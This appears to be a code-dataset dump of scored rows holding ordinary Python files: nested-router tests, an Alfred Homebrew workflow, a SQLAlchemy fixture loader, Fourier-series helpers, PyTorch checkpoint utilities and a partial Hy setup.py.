self.a_router = NestedSimpleRouter(self.router, r'parents', lookup='ui-parent_2')
self.a_router.register(r'child', BViewSet, base_name='ui-parent-child')
class TestRouterSettingInheritance(TestCase):
"""
Ensure that nested routers inherit the trailing_slash option from
their parent unless explicitly told not to.
note: drf transforms the boolean from the kwargs into an internal
pattern string, so it required to test these values instead of
the boolean.
trailing_slash=True -> '/'
trailing_slash=False -> ''
trailing_slash should
- always give priority to the value explicitly defined on the router
- if inherited, use the trailing slash exactly as set in the parent
"""
def _assertHasTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'/', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url without trailing slash when it should have")
def _assertDoesNotHaveTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'', "router has trailing slash when it should not")
self.assertFalse(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url with trailing slash when it should not have")
def test_inherits_no_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_inherits_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_explicit_no_trailing_slash(self):
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=False)
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_explicit_trailing_slash(self):
"""
Test whether the trailing_slash=False value is properly overridden when setting
trailing_slash=True on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=True)
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_inherits_nonstandard_trailing_slash(self):
"""
Test whether the trailing_slash attribute, when set with a custom value,
is inherited by the nested routed.
"""
router = SimpleRouter()
router.trailing_slash = '/?'
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self.assertEqual(a_router.trailing_slash, u'/?', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(a_router.urls[0]).endswith('/?$'),
"router created url without trailing slash when it should have") | 0.800926 | 0.298364 |
import os
import sys
import subprocess
from workflow import Workflow3 as Workflow, MATCH_SUBSTRING
from workflow.background import run_in_background
import cask_actions
import helpers
GITHUB_SLUG = 'fniephaus/alfred-homebrew'
OPEN_HELP = 'open https://github.com/fniephaus/alfred-homebrew && exit'
def execute(wf, cmd_list):
opts = wf.settings.get('HOMEBREW_CASK_OPTS', None)
if opts:
if all(k in opts for k in ('appdir')):
cmd_list += ['--appdir=%s' % opts['appdir']]
brew_arch = helpers.get_brew_arch(wf)
new_env = helpers.initialise_path(brew_arch)
result, err = subprocess.Popen(cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=new_env).communicate()
if err:
return 'Error: %s' % err
return result
def get_all_casks():
return execute(wf, ['brew', 'search', '--cask']).splitlines()
def get_installed_casks():
return execute(wf, ['brew', 'list', '--cask']).splitlines()
def get_outdated_casks():
return execute(wf, ['brew', 'outdated', '--cask']).splitlines()
def filter_all_casks(wf, query):
formulas = wf.cached_data('cask_all_casks',
get_all_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_installed_casks(wf, query):
formulas = wf.cached_data('cask_installed_casks',
get_installed_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_outdated_casks(wf, query):
formulas = wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def main(wf):
if wf.update_available:
wf.add_item('An update is available!',
autocomplete='workflow:update',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
find_brew = helpers.brew_installed()
if not (find_brew['INTEL'] or find_brew['ARM']):
helpers.brew_installation_instructions(wf)
else:
# extract query
query = wf.args[0] if len(wf.args) else None
if (not query and
len(wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)) > 0):
wf.add_item('Some of your casks are outdated!',
autocomplete='outdated ',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
if query and query.startswith('install'):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Install cask',
arg='brew install --cask %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and any(query.startswith(x) for x in ['search', 'home']):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('uninstall'):
for formula in filter_installed_casks(wf, query):
name = formula.split(' ')[0]
item = wf.add_item(formula, 'Uninstall cask',
arg='brew uninstall --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
item.add_modifier('alt', 'Uninstall and zap cask',
arg='brew uninstall --cask --zap %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('list'):
for formula in filter_installed_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('outdated'):
for formula in filter_outdated_casks(wf, query):
name = formula.split(' ')[0]
wf.add_item(formula, 'Upgrade cask',
arg='brew upgrade --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('config'):
helpers.edit_settings(wf)
wf.add_item('`settings.json` has been opened.',
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
else:
actions = cask_actions.ACTIONS
# filter actions by query
if query:
actions = wf.filter(query, actions,
key=helpers.search_key_for_action,
match_on=MATCH_SUBSTRING)
if len(actions) > 0:
for action in actions:
wf.add_item(action['name'], action['description'],
uid=action['name'],
autocomplete=action['autocomplete'],
arg=action['arg'],
valid=action['valid'],
icon=helpers.get_icon(wf, 'chevron-right'))
else:
wf.add_item('No action found for "%s"' % query,
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
if len(wf._items) == 0:
query_name = query[query.find(' ') + 1:]
wf.add_item('No formula found for "%s"' % query_name,
autocomplete='%s ' % query[:query.find(' ')],
icon=helpers.get_icon(wf, 'info'))
wf.send_feedback()
# refresh cache
cmd = ['/usr/bin/python', wf.workflowfile('cask_refresh.py')]
run_in_background('cask_refresh', cmd)
if __name__ == '__main__':
wf = Workflow(update_settings={'github_slug': GITHUB_SLUG})
sys.exit(wf.run(main)) | src/cask.py |
import os
import sys
import subprocess
from workflow import Workflow3 as Workflow, MATCH_SUBSTRING
from workflow.background import run_in_background
import cask_actions
import helpers
GITHUB_SLUG = 'fniephaus/alfred-homebrew'
OPEN_HELP = 'open https://github.com/fniephaus/alfred-homebrew && exit'
def execute(wf, cmd_list):
opts = wf.settings.get('HOMEBREW_CASK_OPTS', None)
if opts:
if all(k in opts for k in ('appdir')):
cmd_list += ['--appdir=%s' % opts['appdir']]
brew_arch = helpers.get_brew_arch(wf)
new_env = helpers.initialise_path(brew_arch)
result, err = subprocess.Popen(cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=new_env).communicate()
if err:
return 'Error: %s' % err
return result
def get_all_casks():
return execute(wf, ['brew', 'search', '--cask']).splitlines()
def get_installed_casks():
return execute(wf, ['brew', 'list', '--cask']).splitlines()
def get_outdated_casks():
return execute(wf, ['brew', 'outdated', '--cask']).splitlines()
def filter_all_casks(wf, query):
formulas = wf.cached_data('cask_all_casks',
get_all_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_installed_casks(wf, query):
formulas = wf.cached_data('cask_installed_casks',
get_installed_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_outdated_casks(wf, query):
formulas = wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def main(wf):
if wf.update_available:
wf.add_item('An update is available!',
autocomplete='workflow:update',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
find_brew = helpers.brew_installed()
if not (find_brew['INTEL'] or find_brew['ARM']):
helpers.brew_installation_instructions(wf)
else:
# extract query
query = wf.args[0] if len(wf.args) else None
if (not query and
len(wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)) > 0):
wf.add_item('Some of your casks are outdated!',
autocomplete='outdated ',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
if query and query.startswith('install'):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Install cask',
arg='brew install --cask %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and any(query.startswith(x) for x in ['search', 'home']):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('uninstall'):
for formula in filter_installed_casks(wf, query):
name = formula.split(' ')[0]
item = wf.add_item(formula, 'Uninstall cask',
arg='brew uninstall --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
item.add_modifier('alt', 'Uninstall and zap cask',
arg='brew uninstall --cask --zap %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('list'):
for formula in filter_installed_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('outdated'):
for formula in filter_outdated_casks(wf, query):
name = formula.split(' ')[0]
wf.add_item(formula, 'Upgrade cask',
arg='brew upgrade --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('config'):
helpers.edit_settings(wf)
wf.add_item('`settings.json` has been opened.',
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
else:
actions = cask_actions.ACTIONS
# filter actions by query
if query:
actions = wf.filter(query, actions,
key=helpers.search_key_for_action,
match_on=MATCH_SUBSTRING)
if len(actions) > 0:
for action in actions:
wf.add_item(action['name'], action['description'],
uid=action['name'],
autocomplete=action['autocomplete'],
arg=action['arg'],
valid=action['valid'],
icon=helpers.get_icon(wf, 'chevron-right'))
else:
wf.add_item('No action found for "%s"' % query,
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
if len(wf._items) == 0:
query_name = query[query.find(' ') + 1:]
wf.add_item('No formula found for "%s"' % query_name,
autocomplete='%s ' % query[:query.find(' ')],
icon=helpers.get_icon(wf, 'info'))
wf.send_feedback()
# refresh cache
cmd = ['/usr/bin/python', wf.workflowfile('cask_refresh.py')]
run_in_background('cask_refresh', cmd)
if __name__ == '__main__':
wf = Workflow(update_settings={'github_slug': GITHUB_SLUG})
sys.exit(wf.run(main)) | 0.315314 | 0.083928 |
import argparse
import collections
import datetime
import json
import progress.bar
import sqlalchemy as sa
import sqlalchemy.orm as orm
import _sqlalchemy.models as m
def bar(label, total):
return progress.bar.Bar(label[:32].ljust(32), max=total)
def bulk_insert(db, label, data, into):
label = f"Creating {len(data)} {label}"
pbar = bar(label, len(data))
while data:
chunk = data[:1000]
data = data[1000:]
db.execute(sa.insert(into), chunk)
db.commit()
pbar.next(len(chunk))
pbar.finish()
def reset_sequence(db, tablename):
tab = sa.table(tablename, sa.column("id"))
db.execute(
sa.select(
sa.func.setval(
f"{tablename}_id_seq",
sa.select(tab.c.id)
.order_by(tab.c.id.desc())
.limit(1)
.scalar_subquery(),
)
)
)
def load_data(filename, engine):
session_factory = orm.sessionmaker(bind=engine)
Session = orm.scoped_session(session_factory)
with Session() as db:
# first clear all the existing data
print(f"purging existing data...")
db.execute(sa.delete(m.Directors))
db.execute(sa.delete(m.Cast))
db.execute(sa.delete(m.Review))
db.execute(sa.delete(m.Movie))
db.execute(sa.delete(m.Person))
db.execute(sa.delete(m.User))
db.commit()
# read the JSON data
print("loading JSON... ", end="", flush=True)
with open(filename, "rt") as f:
records = json.load(f)
data = collections.defaultdict(list)
for rec in records:
rtype = rec["model"].split(".")[-1]
datum = rec["fields"]
if "pk" in rec:
datum["id"] = rec["pk"]
# convert datetime
if rtype == "review":
datum["creation_time"] = datetime.datetime.fromisoformat(
datum["creation_time"]
)
data[rtype].append(datum)
print("done")
with Session() as db:
# bulk create all the users
bulk_insert(db, "users", data["user"], m.User)
# bulk create all the people
bulk_insert(db, "people", data["person"], m.Person)
# bulk create all the movies
bulk_insert(db, "movies", data["movie"], m.Movie)
# bulk create all the reviews
bulk_insert(db, "reviews", data["review"], m.Review)
# bulk create all the directors
bulk_insert(db, "directors", data["directors"], m.Directors)
# bulk create all the cast
bulk_insert(db, "cast", data["cast"], m.Cast)
# reconcile the autoincrementing indexes with the actual indexes
reset_sequence(db, "cast")
reset_sequence(db, "directors")
reset_sequence(db, "movie")
reset_sequence(db, "person")
reset_sequence(db, "user")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Load a specific fixture, old data will be purged."
)
parser.add_argument("filename", type=str, help="The JSON dataset file")
args = parser.parse_args()
engine = sa.create_engine(
"postgresql+asyncpg://sqlalch_bench:edgedbbenchmark@localhost:15432/sqlalch_bench?async_fallback=True"
)
load_data(args.filename, engine) | _sqlalchemy/loaddata.py |
import argparse
import collections
import datetime
import json
import progress.bar
import sqlalchemy as sa
import sqlalchemy.orm as orm
import _sqlalchemy.models as m
def bar(label, total):
return progress.bar.Bar(label[:32].ljust(32), max=total)
def bulk_insert(db, label, data, into):
label = f"Creating {len(data)} {label}"
pbar = bar(label, len(data))
while data:
chunk = data[:1000]
data = data[1000:]
db.execute(sa.insert(into), chunk)
db.commit()
pbar.next(len(chunk))
pbar.finish()
def reset_sequence(db, tablename):
tab = sa.table(tablename, sa.column("id"))
db.execute(
sa.select(
sa.func.setval(
f"{tablename}_id_seq",
sa.select(tab.c.id)
.order_by(tab.c.id.desc())
.limit(1)
.scalar_subquery(),
)
)
)
def load_data(filename, engine):
session_factory = orm.sessionmaker(bind=engine)
Session = orm.scoped_session(session_factory)
with Session() as db:
# first clear all the existing data
print(f"purging existing data...")
db.execute(sa.delete(m.Directors))
db.execute(sa.delete(m.Cast))
db.execute(sa.delete(m.Review))
db.execute(sa.delete(m.Movie))
db.execute(sa.delete(m.Person))
db.execute(sa.delete(m.User))
db.commit()
# read the JSON data
print("loading JSON... ", end="", flush=True)
with open(filename, "rt") as f:
records = json.load(f)
data = collections.defaultdict(list)
for rec in records:
rtype = rec["model"].split(".")[-1]
datum = rec["fields"]
if "pk" in rec:
datum["id"] = rec["pk"]
# convert datetime
if rtype == "review":
datum["creation_time"] = datetime.datetime.fromisoformat(
datum["creation_time"]
)
data[rtype].append(datum)
print("done")
with Session() as db:
# bulk create all the users
bulk_insert(db, "users", data["user"], m.User)
# bulk create all the people
bulk_insert(db, "people", data["person"], m.Person)
# bulk create all the movies
bulk_insert(db, "movies", data["movie"], m.Movie)
# bulk create all the reviews
bulk_insert(db, "reviews", data["review"], m.Review)
# bulk create all the directors
bulk_insert(db, "directors", data["directors"], m.Directors)
# bulk create all the cast
bulk_insert(db, "cast", data["cast"], m.Cast)
# reconcile the autoincrementing indexes with the actual indexes
reset_sequence(db, "cast")
reset_sequence(db, "directors")
reset_sequence(db, "movie")
reset_sequence(db, "person")
reset_sequence(db, "user")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Load a specific fixture, old data will be purged."
)
parser.add_argument("filename", type=str, help="The JSON dataset file")
args = parser.parse_args()
engine = sa.create_engine(
"postgresql+asyncpg://sqlalch_bench:edgedbbenchmark@localhost:15432/sqlalch_bench?async_fallback=True"
)
load_data(args.filename, engine) | 0.350421 | 0.241165 |
from __future__ import division
import numpy as np
#==============================================================================
# The hat function
#==============================================================================
def hat(x):
return -npHeaviside(x) * (-np.pi+x)/np.pi + npHeaviside(-x) * (np.pi+x)/np.pi
#==============================================================================
# The step function
#==============================================================================
def step(x):
return npHeaviside(x) - npHeaviside(-1*x)
#==============================================================================
# The sawtooth function
#==============================================================================
def saw(x):
return x/np.pi
def npHeaviside(x):
"""
numpy compatible implementation of heaviside function
:param x: ndarray
:return: ndarray
"""
return np.piecewise(x,
[x<0,
x==0,
x>0],
[lambda arg: 0.0,
lambda arg: 0.5,
lambda arg: 1.0])
def npDirac(x, h):
"""
numpy compatible implementation of dirac delta. This implementation is representing a disrete version of dirac with
width h and height 1/h. Area under dirac is equal to 1.
:param x: ndarray, evaluation point
:param h: width of dirac
:return: ndarray
"""
return npHeaviside(x)*npHeaviside(h-x)*1.0/h
def parser(fun_str):
from sympy import sympify, lambdify
from sympy.abc import x
fun_sym = sympify(fun_str)
fun_lam = lambdify(x, fun_sym,['numpy',
{"Heaviside": npHeaviside},
{"Dirac": npDirac}])
return fun_lam
def number_parser(number_str):
from sympy import sympify
number_sym = sympify(number_str)
return float(number_sym)
def coeff(f, start, end, N):
"""
This function computes the coefficients of the fourier series representation
of the function f, which is periodic on the interval [start,end] up to the
degree N.
"""
return coeff_fft(f, start, end, N)
def coeff_fft(f, start, end, N):
"""
computes the fourier coefficients using fft
:param f:
:param start:
:param end:
:param N:
:return:
"""
M = 4*N+1000+1
x = np.linspace(start, end, M, endpoint=False)
u0 = f(x)
c = np.fft.rfft(u0) / M
a = 2 * np.real(c)
b = -2 * np.imag(c)
a[0] /= 2
return [a[0:N+1], b[0:N+1]]
def fourier_series(a, b, N, T, x):
"""
This function evaluates the fourier series of degree N with the coefficient
vectors a and b and the period length T at the points in the array x.
:param a: even coefficients
:param b: uneven coefficients
:param N: degree of fourier series
:param T: period length
:param x: sample points
:return: fourier series evaluated at sample points
"""
# numpy matrix version of code below
a = a[:N+1]
b = b[:N+1]
"""
y = np.zeros(x.shape)
for k in range(N+1):
kk = k * 2 * np.pi / T
y += (b[k] * np.sin(kk*x) + a[k] * np.cos(kk*x))
"""
k = np.arange(N+1)
kk = k * 2 * np.pi / T
y = np.sum(b * np.sin(np.outer(x, kk)) + a * np.cos(np.outer(x, kk)), axis=1)
return y | Math_Apps/Fourier_series_approximation/fourier_functions.py | from __future__ import division
import numpy as np
#==============================================================================
# The hat function
#==============================================================================
def hat(x):
return -npHeaviside(x) * (-np.pi+x)/np.pi + npHeaviside(-x) * (np.pi+x)/np.pi
#==============================================================================
# The step function
#==============================================================================
def step(x):
return npHeaviside(x) - npHeaviside(-1*x)
#==============================================================================
# The sawtooth function
#==============================================================================
def saw(x):
return x/np.pi
def npHeaviside(x):
"""
numpy compatible implementation of heaviside function
:param x: ndarray
:return: ndarray
"""
return np.piecewise(x,
[x<0,
x==0,
x>0],
[lambda arg: 0.0,
lambda arg: 0.5,
lambda arg: 1.0])
def npDirac(x, h):
"""
numpy compatible implementation of dirac delta. This implementation is representing a disrete version of dirac with
width h and height 1/h. Area under dirac is equal to 1.
:param x: ndarray, evaluation point
:param h: width of dirac
:return: ndarray
"""
return npHeaviside(x)*npHeaviside(h-x)*1.0/h
def parser(fun_str):
from sympy import sympify, lambdify
from sympy.abc import x
fun_sym = sympify(fun_str)
fun_lam = lambdify(x, fun_sym,['numpy',
{"Heaviside": npHeaviside},
{"Dirac": npDirac}])
return fun_lam
def number_parser(number_str):
from sympy import sympify
number_sym = sympify(number_str)
return float(number_sym)
def coeff(f, start, end, N):
"""
This function computes the coefficients of the fourier series representation
of the function f, which is periodic on the interval [start,end] up to the
degree N.
"""
return coeff_fft(f, start, end, N)
def coeff_fft(f, start, end, N):
"""
computes the fourier coefficients using fft
:param f:
:param start:
:param end:
:param N:
:return:
"""
M = 4*N+1000+1
x = np.linspace(start, end, M, endpoint=False)
u0 = f(x)
c = np.fft.rfft(u0) / M
a = 2 * np.real(c)
b = -2 * np.imag(c)
a[0] /= 2
return [a[0:N+1], b[0:N+1]]
def fourier_series(a, b, N, T, x):
"""
This function evaluates the fourier series of degree N with the coefficient
vectors a and b and the period length T at the points in the array x.
:param a: even coefficients
:param b: uneven coefficients
:param N: degree of fourier series
:param T: period length
:param x: sample points
:return: fourier series evaluated at sample points
"""
# numpy matrix version of code below
a = a[:N+1]
b = b[:N+1]
"""
y = np.zeros(x.shape)
for k in range(N+1):
kk = k * 2 * np.pi / T
y += (b[k] * np.sin(kk*x) + a[k] * np.cos(kk*x))
"""
k = np.arange(N+1)
kk = k * 2 * np.pi / T
y = np.sum(b * np.sin(np.outer(x, kk)) + a * np.cos(np.outer(x, kk)), axis=1)
return y | 0.896597 | 0.544135 |
import sys
import hydra
import torch
from omegaconf.listconfig import ListConfig
import logging
from pathlib import Path
log = logging.getLogger(__name__)
# https://github.com/pytorch/examples/blob/8df8e747857261ea481e0b2492413d52bf7cc3a8/imagenet/main.py#L363
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class RedirectOut():
def __init__(self, out):
super().__init__()
self.out = out
self.original = sys.stdout
def __enter__(self):
self.__fd = open(self.out, 'w')
sys.stdout = self.__fd
def __exit__(self, type, value, traceback):
sys.stdout = self.original
self.__fd.close()
def instantiate_augmenters(augmentation_list):
augmentation_methods = []
for augmentation in augmentation_list:
method = list(augmentation)[0]
params = dict(augmentation[method])
if method == 'Sometimes':
params["then_list"] = instantiate_augmenters(params["then_list"])
for k, v in params.items():
if isinstance(v, (list, ListConfig)):
params[k] = tuple(v)
m = hydra.utils.get_method(
f"imgaug.augmenters.{method}")(**params)
augmentation_methods.append(m)
log.debug(
f"Register imgaug.augmenters.{method} as augmentation method")
return augmentation_methods
# https://discuss.pytorch.org/t/access-att-of-model-wrapped-within-torch-nn-dataparallel-maximum-recursion-depth-exceeded/46975/2
class CustomDataParallel(torch.nn.DataParallel):
def __getattr__(self, name):
try:
return super().__getattr__(name)
except AttributeError:
return getattr(self.module, name)
def load_model(model, optimizer, scheduler, path, resume=False):
path = Path(path)
if not path.exists():
log.warning(f"Model path {path} does not exists!")
return 1
checkpoint = torch.load(path)
epoch = checkpoint["epoch"] if resume else 0
state_dict_ = checkpoint['state_dict']
state_dict = {}
# convert data_parallal to model
for k in state_dict_:
if k.startswith('module') and not k.startswith('module_list'):
state_dict[k[7:]] = state_dict_[k]
else:
state_dict[k] = state_dict_[k]
model_state_dict = model.state_dict()
for k in state_dict:
if k in model_state_dict:
if state_dict[k].shape != model_state_dict[k].shape:
log.warning(
f"skip parameter {k} because of shape mismatch")
state_dict[k] = model_state_dict[k]
else:
log.info(f"drop parameter {k}")
for k in model_state_dict:
if k not in state_dict:
log.warning(f"no parameter {k} available")
state_dict[k] = model_state_dict[k]
model.load_state_dict(state_dict, strict=False)
log.info(f"restore pretrained weights")
if resume and 'optimizer' in checkpoint and optimizer is not None:
log.info(f"restore optimizer state at epoch {epoch}")
optimizer.load_state_dict(checkpoint['optimizer'])
if 'scheduler' in checkpoint and scheduler is not None:
log.info("restore scheduler state")
scheduler.load_state_dict(checkpoint['scheduler'])
return (epoch + 1) if resume else epoch
def save_model(model, path, epoch, optimizer=None, scheduler=None):
if isinstance(model, torch.nn.DataParallel):
state_dict = model.module.state_dict()
else:
state_dict = model.state_dict()
data = {
'epoch': epoch,
'state_dict': state_dict
}
if optimizer is not None:
data["optimizer"] = optimizer.state_dict()
if scheduler is not None:
data["scheduler"] = scheduler.state_dict()
torch.save(data, path) | utils/helper.py | import sys
import hydra
import torch
from omegaconf.listconfig import ListConfig
import logging
from pathlib import Path
log = logging.getLogger(__name__)
# https://github.com/pytorch/examples/blob/8df8e747857261ea481e0b2492413d52bf7cc3a8/imagenet/main.py#L363
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class RedirectOut():
def __init__(self, out):
super().__init__()
self.out = out
self.original = sys.stdout
def __enter__(self):
self.__fd = open(self.out, 'w')
sys.stdout = self.__fd
def __exit__(self, type, value, traceback):
sys.stdout = self.original
self.__fd.close()
def instantiate_augmenters(augmentation_list):
augmentation_methods = []
for augmentation in augmentation_list:
method = list(augmentation)[0]
params = dict(augmentation[method])
if method == 'Sometimes':
params["then_list"] = instantiate_augmenters(params["then_list"])
for k, v in params.items():
if isinstance(v, (list, ListConfig)):
params[k] = tuple(v)
m = hydra.utils.get_method(
f"imgaug.augmenters.{method}")(**params)
augmentation_methods.append(m)
log.debug(
f"Register imgaug.augmenters.{method} as augmentation method")
return augmentation_methods
# https://discuss.pytorch.org/t/access-att-of-model-wrapped-within-torch-nn-dataparallel-maximum-recursion-depth-exceeded/46975/2
class CustomDataParallel(torch.nn.DataParallel):
def __getattr__(self, name):
try:
return super().__getattr__(name)
except AttributeError:
return getattr(self.module, name)
def load_model(model, optimizer, scheduler, path, resume=False):
path = Path(path)
if not path.exists():
log.warning(f"Model path {path} does not exists!")
return 1
checkpoint = torch.load(path)
epoch = checkpoint["epoch"] if resume else 0
state_dict_ = checkpoint['state_dict']
state_dict = {}
# convert data_parallal to model
for k in state_dict_:
if k.startswith('module') and not k.startswith('module_list'):
state_dict[k[7:]] = state_dict_[k]
else:
state_dict[k] = state_dict_[k]
model_state_dict = model.state_dict()
for k in state_dict:
if k in model_state_dict:
if state_dict[k].shape != model_state_dict[k].shape:
log.warning(
f"skip parameter {k} because of shape mismatch")
state_dict[k] = model_state_dict[k]
else:
log.info(f"drop parameter {k}")
for k in model_state_dict:
if k not in state_dict:
log.warning(f"no parameter {k} available")
state_dict[k] = model_state_dict[k]
model.load_state_dict(state_dict, strict=False)
log.info(f"restore pretrained weights")
if resume and 'optimizer' in checkpoint and optimizer is not None:
log.info(f"restore optimizer state at epoch {epoch}")
optimizer.load_state_dict(checkpoint['optimizer'])
if 'scheduler' in checkpoint and scheduler is not None:
log.info("restore scheduler state")
scheduler.load_state_dict(checkpoint['scheduler'])
return (epoch + 1) if resume else epoch
def save_model(model, path, epoch, optimizer=None, scheduler=None):
if isinstance(model, torch.nn.DataParallel):
state_dict = model.module.state_dict()
else:
state_dict = model.state_dict()
data = {
'epoch': epoch,
'state_dict': state_dict
}
if optimizer is not None:
data["optimizer"] = optimizer.state_dict()
if scheduler is not None:
data["scheduler"] = scheduler.state_dict()
torch.save(data, path) | 0.612078 | 0.167151 |
import os
import re
import sys
from setuptools import find_packages, setup
PKG = "hy"
VERSIONFILE = os.path.join(PKG, "version.py")
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
__version__ = mo.group(1)
else:
msg = "if %s.py exists, it is required to be well-formed" % VERSIONFILE
raise RuntimeError(msg)
long_description = """Hy is a Python <--> Lisp layer. It helps
make things work nicer, and lets Python and the Hy lisp variant play
nice together. """
install_requires = ['rply>=0.7.0', 'astor>=0.5', 'clint>=0.4']
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse>=1.2.1')
install_requires.append('importlib>=1.0.2')
if os.name == 'nt':
install_requires.append('pyreadline>=2.1')
setup(
name=PKG,
version=__version__,
install_requires=install_requires,
entry_points={
'console_scripts': [
'hy = hy.cmdline:hy_main',
'hyc = hy.cmdline:hyc_main',
'hy2py = hy.cmdline:hy2py_main',
]
},
packages=find_packages(exclude=['tests*']),
package_data={
'hy.contrib': ['*.hy'],
'hy.core': ['*.hy'],
},
author="<NAME>",
author_email="<EMAIL>",
long_description=long_description,
description='Lisp and Python love each other.',
license="Expat",
url="http://hylang.org/",
platforms=['any'],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: DFSG approved",
"License :: OSI Approved :: MIT License", # Really "Expat". Ugh.
"Operating System :: OS Independent",
"Programming Language :: Lisp",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Code Generators",
"Topic :: Software Development :: Compilers",
"Topic :: Software Development :: Libraries",
]
) | setup.py |
import os
import re
import sys
from setuptools import find_packages, setup
PKG = "hy"
VERSIONFILE = os.path.join(PKG, "version.py")
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
